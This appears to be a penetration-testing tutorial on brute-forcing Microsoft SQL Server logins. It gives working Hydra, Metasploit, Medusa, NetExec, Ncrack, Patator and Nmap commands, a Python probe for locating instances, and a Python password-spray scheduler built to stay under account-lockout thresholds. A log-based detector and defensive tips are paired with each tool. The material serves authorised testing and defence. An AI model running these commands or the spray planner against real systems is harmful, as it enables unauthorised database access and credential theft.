Password Cracking: MS-SQL
MSSQL brute-force attacks are a frequent initial access tactic during internal assessments and red team operations. Microsoft SQL Server, commonly exposed on TCP port 1433, often holds sensitive data and privileges, making it a high value target. When SQL authentication is enabled (mixed mode), attackers can guess weak credentials with tools such as Hydra, Metasploit, or Nmap NSE scripts.
This guide explores advanced techniques for exploiting MSSQL authentication mechanisms across diverse network environments.
MITRE ATT&CK Techniques:
- T1110.001 – Brute Force: Password Guessing
- T1046 – Network Service Discovery
- T1078 – Valid Accounts
Table of Contents
Introduction
Enumeration
- Scan for Open MSSQL Port with Nmap
Brute-Force Techniques
- Hydra
- Metasploit
- Medusa
- NetExec (nxc)
- Ncrack
- Patator
- Nmap NSE Script (ms-sql-brute.nse)
Introduction
Microsoft SQL Server (MSSQL) is a relational database platform commonly deployed in enterprise networks to manage and store structured data. The default instance listens on TCP port 1433; named instances take a dynamic port and are located through the SQL Server Browser service on UDP 1434. The server supports both SQL authentication (logins stored in the instance itself) and Windows authentication. Windows authentication offers better security via Active Directory integration, but SQL authentication remains widely used, often with weak or default credentials such as the built-in sa account.
MSSQL instances, especially in internal or hybrid environments, can become high value targets due to their access to sensitive data and administrative privileges. Improperly secured deployments may allow attackers to exploit exposed services through brute force attacks, making MSSQL a critical component in penetration testing and red teaming assessments.
Enumeration
Nmap Scan
To begin enumeration, run an Nmap scan against the target IP address to confirm that an MSSQL service is listening and to collect its version. The version narrows down which patch level and configuration weaknesses apply.
nmap -p 1433 -sV 192.168.1.80
Explanation:
- -p 1433: Scans the default Microsoft SQL Server port, 1433.
- -sV: Enables version detection to identify the specific MSSQL version running on the target host.
Once Nmap confirms that port 1433 is open and an MSSQL service is active, that information drives the authentication attacks in the next phase. If nothing answers on 1433, the instance may be a named one on a dynamic port: query the Browser service with nmap -sU -p 1434 --script ms-sql-info, or scan the full TCP range, and then point each brute-force tool at the port you find.
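The following is an added example for this article, not code from the original post or from Nmap. It sends the one-byte CLNT_UCAST_EX request to the SQL Server Browser service (SSRP, UDP 1434) and parses the reply, which lists every instance on the host together with the TCP port it actually listens on, so named instances on dynamic ports that a -p 1433 scan never touches are found as well. The function names are this example's own, and SAMPLE_DATAGRAM is a constructed reply in the SVR_RESP layout (one type byte, a 16-bit little-endian length, then ASCII key;value pairs with instances separated by ";;"); the host and instance names in it are invented. It assumes the Browser service is running and UDP 1434 is not filtered.

```python
"""Locate SQL Server instances, including named instances on dynamic ports,
via the SQL Server Browser service (SSRP on UDP 1434).

Added example for this article; not code from the original post or from Nmap.
Function names (probe_browser, parse_ssrp, off_default_port) are this example's own.
SAMPLE_DATAGRAM is a constructed response; the names inside it are invented.
"""
import socket

SSRP_PORT = 1434
CLNT_UCAST_EX = b"\x03"   # request: list every instance on the host
SVR_RESP_TYPE = 0x05      # first byte of the server's reply


def parse_ssrp(datagram):
    """Parse an SVR_RESP datagram (type byte, 16-bit LE length, ASCII key;value list)
    into one dict per instance. Instances are separated by ';;'."""
    if len(datagram) < 3 or datagram[0] != SVR_RESP_TYPE:
        raise ValueError("not an SSRP SVR_RESP datagram")
    size = int.from_bytes(datagram[1:3], "little")
    body = datagram[3:3 + size].decode("ascii", errors="replace")
    instances = []
    for chunk in body.split(";;"):
        fields = chunk.split(";")
        if len(fields) < 2:
            continue  # trailing empty element after the final ';;'
        instances.append({fields[i]: fields[i + 1] for i in range(0, len(fields) - 1, 2)})
    return instances


def off_default_port(instances):
    """Instances a 'nmap -p 1433' scan would miss: TCP listeners on ports other than 1433."""
    return [i for i in instances if i.get("tcp") not in (None, "1433")]


def probe_browser(host, timeout=3.0):
    """Send CLNT_UCAST_EX to the Browser service and parse whatever comes back.
    Returns [] if the service is absent, filtered, or silent within the timeout."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(CLNT_UCAST_EX, (host, SSRP_PORT))
        try:
            data, _ = s.recvfrom(65535)
        except socket.timeout:
            return []
    return parse_ssrp(data)


# Constructed sample: one default instance on 1433 and one named instance on a dynamic port.
_SAMPLE_BODY = (
    b"ServerName;SQL01;InstanceName;MSSQLSERVER;IsClustered;No;Version;15.0.2000.5;tcp;1433;;"
    b"ServerName;SQL01;InstanceName;SQLEXPRESS;IsClustered;No;Version;15.0.2000.5;"
    b"tcp;49172;np;\\\\SQL01\\pipe\\MSSQL$SQLEXPRESS\\sql\\query;;"
)
SAMPLE_DATAGRAM = bytes([SVR_RESP_TYPE]) + len(_SAMPLE_BODY).to_bytes(2, "little") + _SAMPLE_BODY

if __name__ == "__main__":
    import sys
    found = probe_browser(sys.argv[1]) if len(sys.argv) > 1 else parse_ssrp(SAMPLE_DATAGRAM)
    for inst in found:
        print(f"{inst.get('ServerName')}\\{inst.get('InstanceName')}  "
              f"tcp={inst.get('tcp', '-')}  version={inst.get('Version')}")
```

Run it with a host argument to probe a live server; with no argument it parses the constructed datagram. An instance reported with tcp=49172 is then attacked on that port, for example with hydra -s 49172 or nmap -p 49172 --script ms-sql-brute.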
Defensive Strategy:
Use an IDS such as Zeek or Suricata to flag port-scan behaviour. Restrict TCP 1433 and UDP 1434 to known client IPs with firewall or NSG rules.
Brute-Force Techniques
Tools Quick Reference
Hydra
Hydra is particularly effective in environments where SQL authentication is enabled and weak or default credentials are in use. The success of such attacks largely depends on the quality of the wordlists used, such as user.txt for usernames and pass.txt for passwords.
Step To Reproduce
To perform a brute force attack against an MSSQL service, use the following command:
hydra -L user.txt -P pass.txt 192.168.1.80 mssql
Explanation:
- -L user.txt: Specifies the path to the username list.
- -P pass.txt: Specifies the path to the password list.
- 192.168.1.80: Target IP address.
- mssql: Protocol module to attack. For an instance on a non-default port add -s <port>; -u loops over all users for each password (a spray) instead of sending every password to one login in a row, which keeps individual accounts further from a lockout threshold.
Hydra will systematically test each username-password pair against the MSSQL service on the specified host. If valid credentials are found, Hydra will clearly report the success.
Detection Strategy:
SQL Server audits failed logins by default (login auditing set to "Failed logins only"): error 18456 is written to the ERRORLOG and to the Windows Application log as Event ID 18456 from the MSSQLSERVER source, with the client IP and a state code that tells you why (state 5: the login does not exist, state 8: wrong password). Forward these to the SIEM, alert on bursts per client IP, and add SQL Server Audit or an Extended Events session if you also need successful logins. Block offending sources at the host firewall; Fail2Ban is an option for SQL Server on Linux, where it can watch the ERRORLOG.
Metasploit
Metasploit includes an auxiliary module that automates brute-force attempts with detailed logging, modular options, and integration into post-exploitation workflows. It is particularly effective during red team simulations where SQL Server access is needed for pivoting, lateral movement, or persistence, and its structured output feeds reporting tools or pipelines.
This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).
Step To Reproduce
msf6 > use auxiliary/scanner/mssql/mssql_login
msf6 auxiliary(scanner/mssql/mssql_login) > set rhosts 192.168.1.80
msf6 auxiliary(scanner/mssql/mssql_login) > set user_file user.txt
msf6 auxiliary(scanner/mssql/mssql_login) > set pass_file pass.txt
msf6 auxiliary(scanner/mssql/mssql_login) > set verbose false
msf6 auxiliary(scanner/mssql/mssql_login) > run
Explanation:
- use auxiliary/scanner/mssql/mssql_login: Loads the MSSQL login scanner module used for brute force authentication.
- set rhosts 192.168.1.80: Specifies the IP address of the target MSSQL server.
- set user_file user.txt: Defines the file containing potential usernames.
- set pass_file pass.txt: Defines the file containing passwords to pair with the usernames.
- set verbose false: Disables verbose output to reduce console noise during the brute force process.
- run: Executes the module and begins testing all username password combinations against the MSSQL service.
Defensive Control:
Monitor audit logs for repeated failures, block the source at the host firewall or NSG, and correlate a port scan followed by a burst of login attempts from the same host.
Medusa
Medusa is designed to support large scale login attempts by testing multiple username password combinations simultaneously across multiple hosts or services. It is particularly effective in internal environments where SQL authentication is enabled.
In this case, we can efficiently attempt login combinations against MSSQL targets using prepared dictionaries such as user.txt and pass.txt.
Step To Reproduce
Below we have successfully grabbed credentials using the following command:
medusa -h 192.168.1.80 -U user.txt -P pass.txt -M mssql | grep "ACCOUNT FOUND"
Explanation:
- medusa: Invokes the Medusa brute force tool.
- -h 192.168.1.80: Specifies the IP address of the target machine.
- -U: Points to a file containing a list of usernames to try.
- -P: Points to a file containing a list of passwords.
- -M mssql: Indicates that the MSSQL module should be used for this attack.
- | grep "ACCOUNT FOUND": Filters the output to the lines Medusa prints for successful logins, so valid credentials stand out.
Defensive Strategy:
Detect bulk login failures with SIEM correlation and rate-limit connections per source IP. Account lockout applies to SQL logins only when they were created with CHECK_POLICY = ON, which makes them inherit the Windows lockout policy; check is_policy_checked in sys.sql_logins rather than assuming a lockout exists.
Netexec (aka nxc)
NetExec can brute-force Microsoft SQL Server logins from supplied username and password lists. It is particularly useful for mass validation of credential pairs obtained during earlier recon or OSINT phases, especially in internal environments where SQL authentication is enabled and network segmentation is limited.
Step To Reproduce
To initiate a brute force attack against an MSSQL service using NetExec, run the following command:
nxc mssql 192.168.1.80 -u user.txt -p pass.txt --local-auth | grep '\[+\]'
Explanation:
- nxc: Invokes the NetExec tool.
- mssql: Specifies the protocol to target for MSSQL.
- 192.168.1.80: The IP address of the target host.
- -u user.txt: Path to the file containing a list of usernames.
- -p pass.txt: Path to the file containing a list of passwords. By default every username is tried with every password; add --no-bruteforce to test the two lists pairwise (first line with first line, and so on), which is what you want for leaked credential pairs, and --continue-on-success to keep going after the first hit.
- --local-auth: Authenticate as a SQL login rather than a Windows or domain account. Without it NetExec attempts Windows authentication, so SQL-only credentials never succeed.
- | grep '\[+\]': Filters the output to the lines NetExec prefixes with [+], i.e. successful logins.
Defensive Strategy:
Monitor failed and successful logins. Limit SQL access by IP. Enforce Windows Authentication where possible: with SERVERPROPERTY('IsIntegratedSecurityOnly') = 1 the instance refuses SQL logins entirely, and where mixed mode must stay, disable or rename the sa account.
Ncrack
Ncrack supports modular configuration and multithreaded execution, allowing for efficient brute force attempts while maintaining connection stability and performance.
In MSSQL-focused operations, Ncrack is ideal for quickly testing username and password pairs against exposed database services, particularly in misconfigured or externally accessible SQL environments.
Step To Reproduce
ncrack -U user.txt -P pass.txt 192.168.1.80 -p 1433
Explanation:
- ncrack: Launches the Ncrack password-cracking tool.
- -U user.txt: Indicates the file containing a list of potential usernames.
- -P pass.txt: Indicates the file containing a list of potential passwords.
- -p 1433: Specifies the MSSQL default port for authentication attempts.
Defensive Strategy:
Rate-limit MSSQL connections per IP. Additionally, use NIDS to alert on rapid authentication attempts. Finally, restrict internet-facing SQL endpoints to minimize exposure.
Patator
Patator allows fine-grained control over brute force behavior—such as custom delays, retry logic, and error handling—making it especially useful in stealthy or evasion-focused engagements.
It can be used to perform MSSQL brute force attacks by iterating through supplied username and password lists which in this case will be user.txt and pass.txt.
patator mssql_login host=192.168.1.80 user=FILE0 0=user.txt password=FILE1 1=pass.txt
Explanation:
- patator: Launches the Patator brute force tool.
- mssql_login: Specifies the module for Microsoft SQL Server login attempts.
- host=192.168.1.80: Indicates the target machine’s IP address.
- user=FILE0 0=user.txt: Assigns FILE0 as a placeholder for usernames, pulling values from user.txt.
- password=FILE1 1=pass.txt: Assigns FILE1 as a placeholder for passwords, pulling values from pass.txt.
Note: To hide failed attempts add -x ignore:fgrep='Login failed for user', the message SQL Server returns for error 18456; the 200 OK and code=530 filters seen in other Patator examples belong to its HTTP and FTP modules, not to mssql_login. Patator's --rate-limit option spaces attempts out when a lockout policy is in play.
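The delay and retry controls above matter because of account lockout. The following is an added example for this article, not code from the original post or from Patator, Hydra or any other tool named here: it builds a spray order (every login gets one password before any login gets a second) and places each attempt at the earliest time that keeps every login below a lockout threshold even if every guess is wrong, then replays the plan against the same lockout model to prove no account would lock. It assumes the target locks a login after `threshold` failures and that the failure counter resets once `window` seconds pass without a failure, which is the Windows account lockout behaviour SQL logins inherit when CHECK_POLICY is on. All names are this example's own and the users and passwords are constructed.

```python
"""Lockout-aware spray schedule for MSSQL credential guessing.

Added example for this article; not code from the original post or from any
tool it names. Assumed lockout model: a login locks after `threshold` failures
and its failure counter resets after `window` seconds without a failure.
Users and passwords below are constructed; all names are this example's own.
"""
from collections import defaultdict


def spray_schedule(users, passwords, threshold=5, window=1800, pace=1.0):
    """Order attempts password-by-password across all users and return
    [(t_seconds, user, password), ...] with each attempt placed at the earliest
    time that keeps every login below the lockout threshold."""
    budget = threshold - 1            # failures we may spend per login before it must rest
    if budget < 1:
        raise ValueError("threshold must be at least 2")
    last = {}                         # login -> time of its most recent attempt
    strikes = defaultdict(int)        # login -> failures inside the current counter window
    plan, now = [], 0.0
    for password in passwords:
        for user in users:
            if user in last and now - last[user] >= window:
                strikes[user] = 0     # the server-side counter has already reset
            if strikes[user] >= budget:
                now = last[user] + window   # wait until this login's counter resets
                strikes[user] = 0
            plan.append((now, user, password))
            last[user] = now
            strikes[user] += 1
            now += pace               # constant pacing between any two attempts
    return plan


def simulate_lockouts(plan, threshold, window):
    """Replay a plan under the same lockout model assuming every attempt fails;
    returns the logins that would be locked out (empty for a safe plan)."""
    last, strikes, locked = {}, defaultdict(int), set()
    for t, user, _ in sorted(plan):
        if user in last and t - last[user] >= window:
            strikes[user] = 0
        strikes[user] += 1
        last[user] = t
        if strikes[user] >= threshold:
            locked.add(user)
    return sorted(locked)


# Constructed inputs: three SQL logins and ten candidate passwords.
USERS = ["sa", "backup", "reporting"]
PASSWORDS = [f"Password{i}" for i in range(10)]

if __name__ == "__main__":
    plan = spray_schedule(USERS, PASSWORDS, threshold=5, window=1800)
    for t, user, pw in plan:
        print(f"t+{t:7.0f}s  {user:10s} {pw}")
    print("would lock:", simulate_lockouts(plan, 5, 1800) or "none")
```

With threshold 5 and a 30-minute window the schedule fires four passwords at every login, pauses until the first login's counter has reset, and continues; the same 30 attempts sent back to back would lock all three accounts. Guessing the policy wrong in the other direction is still fatal, so enumerate it (for domain-backed logins, net accounts /domain) before spraying.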
Defensive Suggestion:
Detect retry patterns via audit logs. Apply per-IP throttling. Additionally, use an IPS to block based on behavioural heuristics.
Nmap NSE Script
The ms-sql-brute.nse script allows testers to perform credential based login attempts against Microsoft SQL Server using customized username and password lists.
Step To Reproduce
Firstly, to perform a brute force attack against an MSSQL service using Nmap, run the following command:
nmap -p1433 --script ms-sql-brute.nse --script-args userdb=user.txt,passdb=pass.txt 192.168.1.80
Explanation:
- -p1433: Scans the default port used by MSSQL.
- --script ms-sql-brute.nse: Selects the MSSQL brute-force NSE script.
- --script-args userdb=user.txt,passdb=pass.txt: Provides the script with your custom username and password lists.
This method is especially useful during early stage reconnaissance to identify weak or default MSSQL credentials on a target system.
Defensive Strategy:
Detect sequential login failures tied to Nmap scans. Block offending IPs and alert via SIEM.
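Every Detection or Defensive Strategy paragraph above (Hydra, Metasploit, Medusa, NetExec, Ncrack, Patator, Nmap) rests on the same signal: a burst of error 18456 entries from one client IP. The following is an added example for this article, not code from the original post or from any vendor, showing that detection run over ERRORLOG text. It pairs the two lines SQL Server writes per failed login (the Error/State line and the "Login failed for user ... [CLIENT: ip]" line), counts failures per client in a sliding window, and labels the burst as a spray (many logins) or a single-account brute force, using the state code to separate unknown logins from wrong passwords. SAMPLE_LOG is constructed to match that ERRORLOG format; the IPs, logins and timestamps are invented, and the function names are this example's own.

```python
"""Detect MSSQL brute-force or spray activity from SQL Server ERRORLOG lines.

Added example for this article; not code from the original post or from any
vendor. SAMPLE_LOG is constructed to match the ERRORLOG format for error 18456
(two lines per failed login); IPs, logins and timestamps are invented.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# First line of each failure carries the state code, the second the login and client IP.
ERROR_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+"
    r"Error: 18456, Severity: \d+, State: (?P<state>\d+)\."
)
FAIL_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<ip>[^\]]+)\]"
)
# Common 18456 states: 5 = login does not exist, 7 = login disabled, 8 = wrong password.
STATE_MEANING = {5: "unknown login", 7: "disabled login", 8: "wrong password"}
TS_FMT = "%Y-%m-%d %H:%M:%S.%f"


def parse_failures(lines):
    """Pair Error/Login-failed lines and return one event dict per failed login."""
    events, pending_state = [], None
    for line in lines:
        m = ERROR_RE.match(line)
        if m:
            pending_state = int(m.group("state"))
            continue
        m = FAIL_RE.match(line)
        if m:
            events.append({"ts": datetime.strptime(m.group("ts"), TS_FMT),
                           "user": m.group("user"), "ip": m.group("ip"),
                           "state": pending_state})
            pending_state = None
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Alert on any client IP with >= threshold failures inside one sliding window."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev["ip"]].append(ev)
    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        peak, start = 0, 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < threshold:
            continue
        users = sorted({e["user"] for e in evs})
        alerts.append({
            "ip": ip, "peak_failures_in_window": peak, "total_failures": len(evs),
            "users": users,
            "pattern": "password spray" if len(users) > 1 else "single-account brute force",
            "reasons": sorted({STATE_MEANING.get(e["state"], f"state {e['state']}") for e in evs}),
            "first": evs[0]["ts"], "last": evs[-1]["ts"],
        })
    return alerts


# Constructed ERRORLOG excerpt: a six-attempt burst from one host, one stray failure elsewhere.
_REASON = {5: "Could not find a login matching the name provided.",
           8: "Password did not match that for the login provided."}


def _fail(ts, user, state, ip):
    return [f"{ts} Logon       Error: 18456, Severity: 14, State: {state}.",
            f"{ts} Logon       Login failed for user '{user}'. Reason: {_REASON[state]} [CLIENT: {ip}]"]


SAMPLE_LOG = []
for _i, (_u, _s) in enumerate([("sa", 8), ("sa", 8), ("admin", 5), ("backup", 5), ("sa", 8), ("sqladmin", 8)]):
    SAMPLE_LOG += _fail(f"2024-05-02 10:15:{_i:02d}.40", _u, _s, "192.168.1.50")
SAMPLE_LOG += _fail("2024-05-02 10:20:11.07", "app_user", 8, "10.0.0.7")

if __name__ == "__main__":
    for alert in detect_bruteforce(parse_failures(SAMPLE_LOG)):
        print(alert)
```

The same logic applies to Event ID 18456 pulled from the Windows Application log, since the message text is identical. Keep the state codes in the alert: a run of "unknown login" states means the attacker is still guessing usernames, while "wrong password" against one existing login is the moment to check whether that login has CHECK_POLICY and a lockout behind it.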
MSSQL Brute-Force – Offense, Defence & MITRE Mapping
Defence-in-Depth Summary
To learn more about Password Cracking, follow this Link.
Author: Kinjal Patel is a seasoned penetration tester and technical content writer. Contact at LinkedIn
kali sparta
Thank u so much 😀
Hi, in Hydra, if the SQL Server instance name is "ip\servername", how do I set it in the Hydra command?
I was only using Metasploit, but after reading this I'll test xhydra and medusa.